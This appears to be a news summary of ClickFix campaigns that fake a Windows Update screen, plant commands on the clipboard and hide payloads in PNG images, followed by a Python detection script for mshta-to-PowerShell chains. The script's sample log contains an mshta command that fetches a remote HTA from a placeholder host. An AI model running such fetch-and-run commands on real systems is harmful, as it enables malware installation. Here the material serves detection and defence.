ClickFix campaign disguises itself as Windows Update screen
"The techniques used in these campaigns are a clear evolution of previous ClickFix methods. Whereas previously commands were simply shared for users to copy themselves, now a script on the web page ensures that malicious instructions are automatically placed on the clipboard. The visitor is then instructed to press a key combination to complete the supposed update process. This causes the copied commands to be executed immediately in the Windows command prompt."
"A special feature of the latest variants is the use of steganography to hide the actual malware in images. The attackers do not process the malicious code as an addition to an existing file, but place fragments of the payload in the pixel structure of PNG images. According to researchers, specific color channels are manipulated in such a way that the final payload can only be reconstructed in memory when a loader written for this purpose becomes active."
New ClickFix campaigns present a convincing full-screen fake Windows Update interface that persuades users to perform update steps. The webpage automatically copies malicious commands to the clipboard, then instructs the visitor to press a key combination that runs those commands in the Windows command prompt. The campaigns hide malware payloads by embedding fragments into PNG pixel structures via steganography, manipulating specific color channels so reconstruction occurs only in memory. Initial execution commonly uses mshta to run JavaScript, followed by PowerShell scripts and a .NET assembly called Stego Loader containing encrypted resources used to reconstruct and load the payload.
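The execution chain summarized above (mshta.exe launched against a remote page, which then spawns PowerShell) is something an endpoint telemetry pipeline can flag. The following is an added detection example written for this summary; it is not code from Techzine or the researchers cited. It assumes process-creation records exported as pipe-separated lines (time|pid|ppid|image|cmdline) and uses constructed sample records, not telemetry from the reported campaign.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (pipe-separated: time|pid|ppid|image|cmdline).
# These are invented for this example, not telemetry from the reported campaign.
SAMPLE_LOG = r"""
10:00:01|3188|1000|C:\Windows\explorer.exe|explorer.exe
10:00:05|4120|3188|C:\Windows\System32\mshta.exe|mshta.exe https://update-check.invalid/w.hta
10:00:07|4301|4120|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -Command (elided)
10:00:20|4400|3188|C:\Windows\System32\notepad.exe|notepad.exe
10:00:30|4450|3188|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\Scripts\inventory.ps1
10:01:00|4500|3188|C:\Windows\System32\mshta.exe|mshta.exe C:\Users\alice\AppData\Local\Temp\local.hta
""".strip()


@dataclass
class ProcEvent:
    time: str
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        # Executable base name, case-folded, so path and casing differences do not matter.
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> list[ProcEvent]:
    """Parse the assumed pipe-separated export into ProcEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        time, pid, ppid, image, cmdline = line.split("|", 4)
        events.append(ProcEvent(time, int(pid), int(ppid), image, cmdline))
    return events


URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Script hosts whose appearance as a child of mshta.exe matches the chain in the summary.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def detect_clickfix_chain(events: list[ProcEvent]) -> list[tuple[str, int, str]]:
    """Return (rule, pid, cmdline) findings for the mshta -> PowerShell pattern.

    Parent resolution here is by PID only; real telemetry should use the
    parent process GUID or parent image field, since PIDs are reused.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        # Rule 1: mshta.exe asked to fetch and run content from a remote URL.
        if e.name == "mshta.exe" and URL_RE.search(e.cmdline):
            findings.append(("mshta_remote_url", e.pid, e.cmdline))
        # Rule 2: a script host started by mshta.exe (the second stage in the summary).
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.name == "mshta.exe" and e.name in SCRIPT_HOSTS:
            findings.append(("script_host_spawned_by_mshta", e.pid, e.cmdline))
    return findings


if __name__ == "__main__":
    for rule, pid, cmdline in detect_clickfix_chain(parse_log(SAMPLE_LOG)):
        print(f"[{rule}] pid={pid} cmdline={cmdline}")
```

On the constructed records only the remote-URL mshta launch and the PowerShell process it spawns are flagged; the locally sourced HTA and the administrator's inventory script are left alone. Correlating the two rules on the same process tree, rather than alerting on either alone, is what keeps the false-positive rate workable in an environment that legitimately uses mshta.exe.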
Read at Techzine Global